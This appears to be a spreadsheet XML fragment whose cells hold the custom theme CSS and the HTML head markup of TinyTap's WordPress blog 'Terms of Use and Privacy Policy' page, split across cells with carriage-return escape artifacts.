.nectar-slider-wrap[data-fullscreen="true"]:not(.loaded) .swiper-container{height:calc(100vh - 164px - 32px)!important;}}#nectar_fullscreen_rows{background-color:;}
.nectar-fancy-box[data-style="color_box_basic"] { border-radius: 50px!important; }_x005F_x000D_
_x005F_x000D_
/* Store badges*/_x005F_x000D_
.appstore-badge-margin{_x005F_x000D_
    width: 150px!important;_x005F_x000D_
    height: 48px!important;_x005F_x000D_
    margin-left: 115px!important;_x005F_x000D_
    margin-bottom: 20px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.appstore-badge {_x005F_x000D_
    width: 150px!important;_x005F_x000D_
    height: 48px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* App icons without text 215px */_x005F_x000D_
.app-icon-smallt3{_x005F_x000D_
   height: 100px!important;_x005F_x000D_
   width: 100px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.app-icon-header{_x005F_x000D_
   height: 150px!important;_x005F_x000D_
   width: 150px!important;_x005F_x000D_
}_x005F_x000D_
/* icons for parents pages */_x005F_x000D_
 .roundicon{_x005F_x000D_
   height: 70%!important;_x005F_x000D_
   width: 70%!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
@media only screen and (min-width : 1px) and (max-width : 690px) {_x005F_x000D_
    .app-icon-header{_x005F_x000D_
       height: 100px!important;_x005F_x000D_
       width: 100px!important;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
@media only screen and (min-width : 690px) and (max-width : 1000px) {_x005F_x000D_
.app-icon-header{_x005F_x000D_
   height: 130px!important;_x005F_x000D_
   width: 130px!important;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
_ x000D_
@media only screen and (min-width : 1px) and (max-width : 1000px) {_x005F_x000D_
.app-icon-smallt3{_x005F_x000D_
  alignment-adjust:left!important; _x005F_x000D_
 float:left!important;_x005F_x000D_
 }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/</t>
  </si>
  <si>
    <t xml:space="preserve">* This handles the Mailchimp subscription style*/_x005F_x000D_
.mc4wp-form-fields input[type="email"] {_x005F_x000D_
    font-size: 18px!Important;_x005F_x000D_
    width: 50%;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
 .mc4wp-form-fields input[type="submit"] {_x005F_x000D_
   display: block;_x005F_x000D_
   position: absolute;_x005F_x000D_
   right:25%!important;;_x005F_x000D_
    margin-top:-80px!important;_x005F_x000D_
    font-size: 20px!Important;_x005F_x000D_
    width: 15%;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">/*Mailchimp subscription style on iPads*/_x005F_x000D_
@media only screen and (max-width: 1000px) and (min-width: 690px){_x005F_x000D_
     .mc4wp-form-fields input[type="email"] {_x005F_x000D_
    font-size: 16px!Important;_x005F_x000D_
    width: 80%;_x005F_x000D_
    _x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.mc4wp-form-fields input[type="submit"] {_x005F_x000D_
   display: block;_x005F_x000D_
   position: absolute;_x005F_x000D_
   right:10%!important;_x005F_x000D_
    margin-top:-77px!important;_x005F_x000D_
    font-size: 17px!Important;_x005F_x000D_
    width: 23%;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
/*Mailchimp subscription style on iPhones*/_x005F_x000D_
@media only screen and (min-width : 1px) and (max-width : 690px) {_x005F_x000D_
    .mc4wp-form-fields input[type="email"] {_x005F_x000D_
    font-size: 16px!Important;_x005F_x000D_
    width: 100%;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">.mc4wp-form-fields input[type="submit"] {_x005F_x000D_
   display: block;_x005F_x000D_
   position: absolute;_x005F_x000D_
   right:0.1%!important;_x005F_x000D_
    margin-top:-75px!important;_x005F_x000D_
    font-size: 15px!Important;_x005F_x000D_
    width: 37%;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
@media only screen and (max-width: 1000px) and (min-width: 690px){_x005F_x000D_
    .press-text _x005F_x000D_
    {_x005F_x000D_
        font-size: 15px!Important;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/ * This pushes the field to the left*/_x005F_x000D_
/*_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">.mc4wp-form-fields p:first-of-type {_x005F_x000D_
    width: 80%!important; _x005F_x000D_
}*/_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
/ * This handles the subscriptions hidden reply i.e. success etc*/_x005F_x000D_
/*.mc4wp-response {_x005F_x000D_
    position:absolute!important;_x005F_x000D_
    width:100%!important;_x005F_x000D_
    top:170px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
*/_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
/*  </t>
  </si>
  <si>
    <t>FORM FIELDS*/ _x005F_x000D_
_ x000D_
body input[type="text"], body textarea, body input[type="email"], body input[type="password"], body input[type="search"], body  input[type="tel"], body input[type="url"], body input[type="date"] {_x005F_x000D_
    _ x000D_
    line-height: 20px! important; /*  Affects size of pill fields */_x005F_x000D_
    padding:</t>
  </si>
  <si>
    <t>15px 35px 15px!important;_x005F_x000D_
    -moz-border-radius: 30px;_x005F_x000D_
    -webkit-border-radius: 30px;_x005F_x000D_
    border-radius: 30px;_x005F_x000D_
    font-size: 16px!important;_x005F_x000D_
    margin-top: 5px!important; /*  Affects Margin of text over pill fields */_x005F_x000D_
    /*border-style: solid!important;_x005F_x000D_
    border-width: 2px!important;_x005F_x000D_
    border-color: rgba(255, 255, 255, 0.2)!important;*/_x005F_x000D_
    _x005F_x000D_
    _x005F_x000D_
    /*background-color: transparent!important;*/_x005F_x000D_
    box-shadow: none!important;_x005F_x000D_
    -webkit-box-shadow: none!important;_x005F_x000D_
    -moz-box-shadow: none!important;_x005F_x000D_
    -o-box-shadow: none!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* TOGGLE BUTTONS/MENUS*/_x005F_x000D_
_x005F_x000D_
.toggle h3 a {_x005F_x000D_
    -moz-border-radius: 30px;_x005F_x000D_
    -webkit-border-radius: 30px;_x005F_x000D_
    border-radius: 30px;_x005F_x000D_
    line-height: 25px!important;_x005F_x000D_
    font-size: 20px!important;_x005F_x000D_
    font-weight: 600!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
html body .toggle &gt; div {_x005F_x000D_
    color: #595959!important;_x005F_x000D_
    background-color: transparent!important;_x005F_x000D_
    box-shadow: none!important;_x005F_x000D_
    padding-bottom:5px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/*  home and parent icons */_x005F_x000D_
.home-icon {_x005F_x000D_
  height: 50%;_x005F_x000D_
  width: 50%;_x005F_x000D_
}_x005F_x000D_
.parent-icon {_x005F_x000D_
  display: block!important;_x005F_x000D_
  margin-left: auto!important;_x005F_x000D_
  margin-right: auto!important;_x005F_x000D_
  height: 40%!important; _x005F_x000D_
  width: 40%!important; _x005F_x000D_
}_x005F_x000D_
@media only screen and (max-width: 1000px) and (min-width: 690px){_x005F_x000D_
    .home-icon {_x005F_x000D_
      height: 70%;_x005F_x000D_
      width: 70%;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
@media only screen and (min-width : 1px) and (max-width : 690px) {_x005F_x000D_
    .home-icon {_x005F_x000D_
      height: 100%;_x005F_x000D_
      width: 100%;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
/*  dots in carousel _x005F_x000D_
/* @media only screen and (min-width : 1000px) {_x005F_x000D_
ol.flickity-page-dots{_x005F_x000D_
    display:none;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
*/_x005F_x000D_
_x005F_x000D_
/*  SHOW/HIDE navigation dots in testimonial carousel */_x005F_x000D_
.testimonial ol.flickity-page-dots{_x005F_x000D_
    display:none;_x005F_x000D_
}_x005F_x000D_
@media only screen and (min-width : 1px) and (max-width : 690px) {_x005F_x000D_
 ol.flickity-page-dots{_x005F_x000D_
    display:block;_x005F_x000D_
 _x005F_x000D_
}_x005F_x000D_
   .testimonial ol.flickity-page-dots{_x005F_x000D_
    display:block;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
/*_x005F_x000D_
ol.flickity-page-dots{_x005F_x000D_
    display:none;_x005F_x000D_
}_x005F_x000D_
*/_x005F_x000D_
_x005F_x000D_
/*  press icon */_x005F_x000D_
.press-icon {_x005F_x000D_
  display: block!important;_x005F_x000D_
  margin-left: auto!important;_x005F_x000D_
  margin-right: auto!important;_x005F_x000D_
  height: 85%!important; _x005F_x000D_
  width: 85%!important; _x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.charicon{_x005F_x000D_
  display: block!important;_x005F_x000D_
  margin-left: auto!important;_x005F_x000D_
  margin-right: auto!important;_x005F_x000D_
  height: 260px!important;_x005F_x000D_
  width: 260px!important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
@media only screen and (min-width : 1px) and (max-width : 1000px) {_x005F_x000D_
.press-icon {_x005F_x000D_
  display: block!important;_x005F_x000D_
  margin-left: auto!important;_x005F_x000D_
  margin-right: auto!important;_x005F_x000D_
  height: 80%!important; _x005F_x000D_
  width: 80%!important; _x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.privacy-charsquare{_x005F_x000D_
   height: 210px!important;_x005F_x000D_
   width: 210px!important;_x005F_x000D_
   margin-top: -50px; _x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* Remove column gap causing line gap in mobile */_x005F_x000D_
@media only screen and (max-width: 999px) and (min-width: 1px) {_x005F_x000D_
    #footer-widgets .container .col {_x005F_x000D_
        margin-bottom: 0px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
        min-height: 0px ! important;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
@media only screen and (max-width: 690px) {_x005F_x000D_
    .vc_row.translate_y_phone_-30px {_x005F_x000D_
        -webkit-transform: translateY(0px)!important;_x005F_x000D_
        transform: translateY(0px)!important;_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.grecaptcha-badge { visibility: hidden; }_x005F_x000D_
_x005F_x000D_
/* HIDE HEADER &amp; FOOTER */_x005F_x000D_
_x005F_x000D_
/*t4-for-parents*/_x005F_x000D_
.page-id-610 #header-outer  { display: none; }_x005F_x000D_
.page-id-610 #header-space  { height: 0px; }_x005F_x000D_
.page-id-610 #header-space  { display: none;}_x005F_x000D_
.page-id-610 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*t3iap*/_x005F_x000D_
.page-id-607 #header-outer  { display: none; }_x005F_x000D_
.page-id-607 #header-space  { height: 0px; }_x005F_x000D_
.page-id-607 #header-space  { display: none;}_x005F_x000D_
.page-id-607 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*t3-for-parents-ios-2*/_x005F_x000D_
.page-id-584 #header-outer  { display: none; }_x005F_x000D_
.page-id-584 #header-space  { height: 0px; }_x005F_x000D_
.page-id-584 #header-space  { display: none;}_x005F_x000D_
.page-id-584 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*subscription-details*/_x005F_x000D_
.page-id-992 #header-outer  { display: none; }_x005F_x000D_
.page-id-992 #header-space  { height: 0px; }_x005F_x000D_
.page-id-992 #header-space  { display: none;}_x005F_x000D_
.page-id-992 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*privacy-app*/_x005F_x000D_
.page-id-558 #header-outer  { display: none; }_x005F_x000D_
.page-id-558 #header-space  { height: 0px; }_x005F_x000D_
.page-id-558 #header-space  { display: none;}_x005F_x000D_
.page-id-558 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*moreinfo-itunes*/_x005F_x000D_
.page-id-578 #header-outer  { display: none; }_x005F_x000D_
.page-id-578 #header-space  { height: 0px; }_x005F_x000D_
.page-id-578 #header-space  { display: none;}_x005F_x000D_
.page-id-578 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*more-info-subscribed*/_x005F_x000D_
.page-id-550 #header-outer  { display: none; }_x005F_x000D_
.page-id-550 #header-space  { height: 0px; }_x005F_x000D_
.page-id-550 #header-space  { display: none;}_x005F_x000D_
.page-id-550 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*more-apps-ios*/_x005F_x000D_
.page-id-574 #header-outer  { display: none; }_x005F_x000D_
.page-id-574 #header-space  { height: 0px; }_x005F_x000D_
.page-id-574 #header-space  { display: none;}_x005F_x000D_
.page-id-574 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*more-apps-googleplay*/_x005F_x000D_
.page-id-563 #header-outer  { display: none; }_x005F_x000D_
.page-id-563 #header-space  { height: 0px; }_x005F_x000D_
.page-id-563 #header-space  { display: none;}_x005F_x000D_
.page-id-563 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*more-apps-amazon*/_x005F_x000D_
.page-id-570 #header-outer  { display: none; }_x005F_x000D_
.page-id-570 #header-space  { height: 0px; }_x005F_x000D_
.page-id-570 #header-space  { display: none;}_x005F_x000D_
.page-id-570 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
/*fitoons-for-parents-ios*/_x005F_x000D_
.page-id-612 #header-outer  { display: none; }_x005F_x000D_
.page-id-612 #header-space  { height: 0px; }_x005F_x000D_
.page-id-612 #header-space  { display: none;}_x005F_x000D_
.page-id-612 #footer-outer  { display: none; }_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
/* /////////////BLOG RELATED  /////////////////////////</t>
  </si>
  <si>
    <t>*/_x005F_x000D_
.excerpt {_x005F_x000D_
    display: none!important;_x005F_x000D_
}_x005F_x000D_
/ * for post pages, hide the white gap at the bottom of the footer*/_x005F_x000D_
.meta-category a{_x005F_x000D_
    color: #6fdb93 !important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* Removes link for the category rounded button in single posts on desktop */_x005F_x000D_
.single</t>
  </si>
  <si>
    <t>.heading-title[data-header-style="default_minimal"] .blog-title .meta-category {_x005F_x000D_
    / * Hides the category rounded button in single posts both desktop and mobile*/_x005F_x000D_
     /*display: none!important;*/_x005F_x000D_
    pointer-events: none !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
}_x005F_x000D_
/* Removes rounded border in category in single posts both desktop and mobile*/_x005F_x000D_
body[data-button-style^=rounded].single .heading-title[data-header-style=default_minimal] .meta-category a{_x005F_x000D_
        border:0 ! important;_x005F_x000D_
}_x005F_x000D_
    /*</t>
  </si>
  <si>
    <t>Hides the category rounded button in single posts on mobile*/_x005F_x000D_
@media only screen and (max-width: 690px) {_x005F_x000D_
    #ajax-content-wrap #page-header-bg[data-post-hs=default_minimal] #single-below-header span:not(.updated), #ajax-content-wrap .row.heading-title[data-header-style=default_minimal] .col.section-title span.meta-category {_x005F_x000D_
         /*display: none !important;*/_x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* for post pages, hide the white gap at the bottom of the footer*/_x005F_x000D_
article.post .content-inner {_x005F_x000D_
    padding-bottom: 0 ! important;_x005F_x000D_
    padding-top: 0 !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/* increase font size for h3 in mobile*/_x005F_x000D_
@media only screen and (max-width: 690px) {_x005F_x000D_
.post .content-inner h3 {_x005F_x000D_
_ x000D_
        line-height: 30px!important;_x005F_x000D_
        font-size: 18px!important;_x005F_x000D_
        font-weight: 100!important;_x005F_x000D_
    }_x005F_x000D_
    _x005F_x000D_
/* moves all content up by 25px on mobile*/_x005F_x000D_
.post</t>
  </si>
  <si>
    <t>.content-inner {_x005F_x000D_
    margin-top: -25px ! important;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
/ * Reduce the header padding of single posts on mobile*/_x005F_x000D_
@media</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;!--[if IE 6]&gt;
&lt;html id="ie6" lang="en-US"&gt;
&lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if !(IE 6) | !(IE 7) | ! (IE 8)  ]&gt;&lt;!--&gt;
&lt;!--&lt;![endif]--&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta property="fb:app_id" content="398907120149017" /&gt;
&lt;meta property="og:title" content="Terms of Use and Privacy Policy" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:url" content="https://blog.tinytap.com/terms-of-use/" /&gt;
&lt;meta property="og:image" content="https://static.tinytap.it/media/images/site/header/logo2.png" /&gt;
&lt;meta property="og:site_name" content="TinyTap blog" /&gt;
&lt;meta charset="UTF-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
&lt;title&gt;Terms of Use and Privacy Policy - TinyTap , The Blog!&lt;/title&gt;
&lt;link rel="profile" href="https://gmpg.org/xfn/11" /&gt;
&lt;link rel="stylesheet" type="text/css" media="all" href="https://blog.tinytap.com/wp-content/themes/NewTinyTap/style.css?v=2.2234" /&gt;
&lt;link rel="pingback" href="https://blog.tinytap.com/xmlrpc.php" /&gt;
&lt;link rel="icon" type="image/png" href='https://static.tinytap.it/media/images/site/header/favicon.png'&gt;
&lt;!--[if lt IE 9]&gt;
&lt;script src="http://blog.tinytap.com/wp-content/themes/NewTinyTap/js/html5.js" type="text/javascript"&gt;&lt;/script&gt;
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if lte IE 9]&gt;
		&lt;script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"&gt;&lt;/script&gt;
        &lt;! [endif]--&gt;
&lt;script type="text/javascript"&gt;
  (function() {
    var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
    po.src = 'https://apis.google.com/js/plusone.js';
     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
  })();
&lt;/script&gt;
&lt;meta itemprop="name" content="Terms of Use and Privacy Policy;"&gt;
&lt;meta itemprop="description" content="TinyTap is the largest library of educational games in the world, featuring over 200,000 games created by educators.</t>
  </si>
  <si>
    <t xml:space="preserve">Using coding-free tools, teachers build interactive games and earn from them based off its engagement. Families can access the content and learn from educational experts, including Sesame Street, Oxford University Press, and Ms. Humblebee. TinyTap’s simple-to-use navigation and audio feedback allow kids to explore any topic independently &amp;#8212; breaking any borders to their education"&gt;
&lt;script&gt;!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");&lt;/script&gt;
&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;link rel="canonical" href="https://blog.tinytap.com/terms-of-use/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Terms of Use and Privacy Policy - TinyTap , The Blog!" /&gt;
&lt;meta property="og:description" content="Terms of Use and Privacy Policy PLEASE CAREFULLY READ OUR PRIVACY POLICY, WHICH IS INCORPORATED BY REFERENCE, BEFORE USING TinyTap.  </t>
  </si>
  <si>
    <t>These Terms affect your legal rights and obligations.   If you do not agree to be bound by all of these Terms, do not access or use the Service. Terms of Service TinyTap, Ltd.  (“TinyTap” or “us,” “our,” “we”) is the creator and owner of a social platform that enables users to access, create, and share educational, interactive content and applications &amp;hellip; Read More" /&gt;
&lt;meta property="og:url" content="https://blog.tinytap.com/terms-of-use/" /&gt;
&lt;meta property="og:site_name" content="TinyTap , The Blog!" /&gt;
&lt;meta property="article:modified_time" content="2020-04-14T08:24:58+00:00" /&gt;
&lt;meta name="twitter:label1" content="Est.</t>
  </si>
  <si>
    <t>reading time" /&gt;
&lt;meta name="twitter:data1" content="51 minutes" /&gt;
&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://blog.tinytap.com/#website","url":"https://blog.tinytap.com/","name":"TinyTap , The Blog!","description":"TinyTap is the largest library of educational games in the world, featuring over 200,000 games created by educators. Using coding-free tools, teachers build interactive games and earn from them based off its engagement. Families can access the content and learn from educational experts, including Sesame Street, Oxford University Press, and Ms. Humblebee.</t>
  </si>
  <si>
    <t>TinyTap’s simple-to-use navigation and audio feedback allow kids to explore any topic independently -- breaking any borders to their education","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://blog.tinytap.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://blog.tinytap.com/terms-of-use/#webpage","url":"https://blog.tinytap.com/terms-of-use/","name":"Terms of Use and Privacy Policy - TinyTap , The Blog!","isPartOf":{"@id":"https://blog.tinytap.com/#website"},"datePublished":"2017-09-28T13:05:49+00:00","dateModified":"2020-04-14T08:24:58+00:00","breadcrumb":{"@id":"https://blog.tinytap.com/terms-of-use/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://blog.tinytap.com/terms-of-use/"]}]},{"@type":"BreadcrumbList","@id":"https://blog.tinytap.com/terms-of-use/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Terms of Use and Privacy Policy"}]}]}&lt;/script&gt;
&lt;link rel='dns-prefetch' href='//secure.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//www.google.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel='dns-prefetch' href='//v0.wordpress.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="TinyTap , The Blog! &amp;raquo; Feed" href="https://blog.tinytap.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="TinyTap , The Blog! &amp;raquo; Comments Feed" href="https://blog.tinytap.com/comments/feed/" /&gt;
&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"\/\/blog.tinytap.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.4"}};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[10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&amp;&amp;t.supports[o[r]],"flag"!==o[r]&amp;&amp;(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&amp;&amp;t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&amp;&amp;n.twemoji&amp;&amp;(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		&lt;/script&gt;
&lt;style type="text/css"&gt;
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='simple_mp3_style-css' href='//blog.tinytap.com/wp-content/plugins/mp3-player/views/style.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='//blog.tinytap.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css' type='text/css'&gt;
.has-text-align-justify{text-align:justify;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='fontawesome-frontend-css-css' href='//blog.tinytap.com/wp-content/plugins/flipbox/assets/css/font-awesome5.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='eb-flipbox-block-frontend-style-css' href='//blog.tinytap.com/wp-content/plugins/flipbox/dist/style.css?ver=1653913154' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='mediaelement-css' href='//blog.tinytap.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-mediaelement-css' href='//blog.tinytap.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='//blog.tinytap.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jetpack_css-css' href='//blog.tinytap.com/wp-content/plugins/jetpack/css/jetpack.css?ver=10.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='appStore-styles-css' href='//blog.tinytap.com/wp-content/plugins/app-store-assistant/css/appStore-styles.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='appStore-jquery-accordian-css' href='//code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='appStore-googlefont-css' href='//fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600&amp;#038;ver=5.8.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='lightbox-styles-css' href='//blog.tinytap.com/wp-content/plugins/app-store-assistant/js_functions/lightbox/css/lightbox.css?ver=5.8.4' type='text/css' media='all' /&gt;
&lt;script type="text/javascript"&gt;_x005F_x000D_
        //&lt;![CDATA[_x005F_x000D_
         var site_url=  'https://blog.tinytap.com';                            _</t>
  </si>
  <si>
    <t>x000D_
         //]]&gt;_x005F_x000D_
        &lt;/script&gt;&lt;script type='text/javascript' src='//blog.tinytap.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//blog.tinytap.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//blog.tinytap.com/wp-content/plugins/mp3-player/javascript.js?ver=5.8.4' id='simple_mp3_player_js-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//blog.tinytap.com/wp-content/plugins/mp3-player/js.js?ver=5.8.4' id='simple_mp3_player_js2-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://blog.tinytap.com/wp-json/" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/json" href="https://blog.tinytap.com/wp-json/wp/v2/pages/4932" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://blog.tinytap.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://blog.tinytap.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 5.8.4" /&gt;
&lt;link rel='shortlink' href='https://wp.me/Pdo18a-1hy' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://blog.tinytap.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fblog.tinytap.com%2Fterms-of-use%2F" /&gt;
&lt;style type='text/css'&gt;
/ * This site uses App Store Assistant version 6.9.1 - 999 */
.appStore-rating_bar
{
	display: inline-block;
	/* width of the background picture * 5 */
	width: 155px;
	text-align: left;
	/*</t>
  </si>
  <si>
    <t>This is the picture of a single empty star */
	background: url(http://blog.tinytap.com/wp-content/plugins/app-store-assistant/images/rating/star-rating-clear.png) 0 0 repeat-x;
	vertical-align: middle;
}
.appStore-rating_bar_text {
	vertical-align: middle;
	font-size: 21px;
}
.appStore-rating_bar span {
	display:inherit;
	/* height of the background picture */
	height: 31px;
	/* This is the picture of a single full star */
	background: url(http://blog.tinytap.com/wp-content/plugins/app-store-assistant/images/rating/star-rating-blue.png) 0 0 repeat-x;
}
.appStore-Button {
	padding: 5px 20px 5px 20px;
	-moz-box-shadow:inset 3px 3px</t>
  </si>
  <si>
    <t>3px 3px #519448;
	-webkit-box-shadow: 3px 3px 3px 3px #519448;
	box-shadow: 3px 3px 3px 3px #519448;
		background: #8FE483;
	background:-moz-linear-gradient(top, #8FE483 5%, #68BD5C 100% );
	background:-webkit-gradient(linear, left top, left bottom, color-stop(5%, #8FE483), color-stop(100%, #68BD5C) );
	background: -webkit-linear-gradient(top, #8FE483 0%,#68BD5C 100%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top, #8FE483 0%,#68BD5C 100%); /* Opera 11.10+ */
	background: -ms-linear-gradient(top, #8FE483 0%,#68BD5C 100%); /* IE10+ */
	background: linear-gradient(top, #8FE483 0%,#68BD5C 100%); /* W3C */
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#68BD5C',GradientType=0);
	background-color:#8FE483;
		-moz-border-radius:5px;
	-webkit-border-radius:5px;
	border-radius:5px;
	border:0px solid #84BBF3;
	display:inline-block;
	color:#FFFFFF;
	font-family:Trebuchet MS;
	font-size:16px;
	font-weight:bold;
	padding:4px 8px;
	text-decoration:none;
	text-shadow:1px 1px 0px #FFFFFF;
	margin-top: 8px;
